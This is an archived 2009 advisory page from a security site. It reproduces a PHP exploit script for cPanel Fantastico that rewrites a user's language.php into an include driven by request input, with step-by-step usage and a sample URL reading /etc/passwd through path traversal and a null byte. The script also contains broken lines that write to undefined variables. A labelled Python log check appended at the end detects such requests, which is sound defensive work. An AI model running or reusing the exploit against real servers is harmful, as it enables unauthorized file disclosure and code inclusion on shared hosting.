SecurityReason.com - Our Reason is Security

Topic: Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"

WLB: WLB-2009070008
SecurityAlert: None
Date: 2009-07-04
Credit: Super-Crystal
Added by: SecurityReason
SecurityRisk: Low
Remote: Yes
Local: Yes
Status: Bug

History: [2009-07-04] Started

Affected software: Cpanel fantastico

Text:

Script: Cpanel 11.x
Bug: language.php [edit file]
Exploit: Cpanel fantastico Privilege Escalation "ModSec and PHP restriction Bypass"

safe_mode off, mod_security off, Disable functions: All NONE, access root folder

<?php
/*
########################################
# Deadly Script by Super-Crystal
# bypass Cpanel fantastico
# www.arab4services.net
# ##e-mail : l1un (at) hotmail (dot) com , i-1 (at) hotmail (dot) com##
#######################################
*/
set_time_limit(0);
if(isset($_POST['sup3r'])) {
if(stristr(php_uname(),"2.6.") &&
stristr(php_uname(),"Linux")) {
$phpwrapper = '<?php
include_once("./language/".$_GET[sup3r].".php");
?>
';
fwrite($h,$prctl);
fclose($h);
$handle = fopen($_POST['php'], "w");
fwrite($handle, $phpwrapper);
fclose($handle);
echo "Building exploit...<br />";
echo "coding by Super-Crystal <br />";
echo "Cleaning up<br />";
echo "Done!<br />
</pre>";
} else {
echo "error : ".php_uname();
}
} else {
?>
<div align="center">
<h3>Deadly Script</h3>
<font color=red>Cpanel fantastico Privilege Escalation "ModSec
and PHP restriction Bypass"</font><br />
<pre><div align="center">
</pre></div><br />
<table border="0" cellspacing="0">
<tr>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>"
method="post">
<table border="0" cellspacing="0">
<tr>
<td><div
align="right">Exploit:</div></td>
<td>
<select name="exploit">
<option selected="selected">Cpanel fantastico Privilege
Escalation "ModSec and PHP restriction Bypass"</option>
</select>
</td>
</tr>
<tr>
<td><div align="right">change</div></td>
<td><input type="text" name="php"
size="50" value="<?php echo
getcwd()."/language.php" ?>" /></td>
</tr>
<tr>
</table>
</div>
<input type="hidden" name="sup3r"
value="doit" />
<input name="submit" type="submit"
value="Submit" /><br />
1- change /home/[user]/.fantasticodata/language.php
<br />
2- click on the submit
<br />
3- now put it like this (e.g)
: http://www.xxxx.com:2082/frontend/x3/fantastico/index.php?sup3r=../../..
/../../../etc/passwd%00 .
<br />
<font color=red>Written: 10.10.2008</font><br />
<font color=blue>Public: 26.11.2008</font><br />
<div align="center">
<font color=red>Author : Super-Crystal</font><br />
<a href="http://www.arab4services.net">Arab4services.net
</a></center>
</div>
</form>
<?php } ?>

arab4services.net
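
Added example (not part of the original advisory or of cPanel/Fantastico): a log check for requests of the shape shown in step 3, flagging path traversal or NUL bytes in any query parameter sent to a Fantastico page. The parameter name is chosen by whoever edited language.php, so every parameter is inspected; the combined-log line format, the sample lines and all function names are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Request line inside a combined-format access log entry (format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Any theme directory, e.g. /frontend/x3/fantastico/ as in the advisory's URL.
FANTASTICO_RE = re.compile(r'^/frontend/[^/]+/fantastico/', re.I)

def fully_decode(raw: str, max_rounds: int = 3) -> bytes:
    """Percent-decode repeatedly so double-encoded input (%252e, %2500) is caught."""
    data = raw.encode("latin-1", "replace")
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data = decoded
    return data

def suspicious_params(log_line: str) -> list:
    """Return (parameter, reason) pairs for traversal or NUL bytes in a Fantastico request."""
    m = REQUEST_RE.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not FANTASTICO_RE.match(url.path):
        return []
    findings = []
    # Work on the raw query string: the parameter name is not fixed, so check them all.
    for pair in url.query.split("&"):
        name, _, raw_value = pair.partition("=")
        value = fully_decode(raw_value).replace(b"\\", b"/")
        if b"\x00" in value:
            findings.append((name, "null byte"))
        if b".." in value.split(b"/"):
            findings.append((name, "path traversal"))
    return findings

SAMPLE_LOG = [  # constructed lines using documentation addresses
    '192.0.2.10 - user [04/Jul/2009:10:00:00 +0000] "GET /frontend/x3/fantastico/index.php?sup3r=../../../../../../etc/passwd%00 HTTP/1.1" 200 1532',
    '192.0.2.11 - user [04/Jul/2009:10:00:05 +0000] "GET /frontend/x3/fantastico/index.php?lang=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 200 1532',
    '192.0.2.12 - user [04/Jul/2009:10:00:09 +0000] "GET /frontend/x3/fantastico/index.php?lang=english HTTP/1.1" 200 7411',
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        print(suspicious_params(line))
```

A hit on a Fantastico URL is a reason to review that account's .fantasticodata/language.php for an include built from request input.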



References: none

Copyright © SecurityReason.com. All Rights Reserved.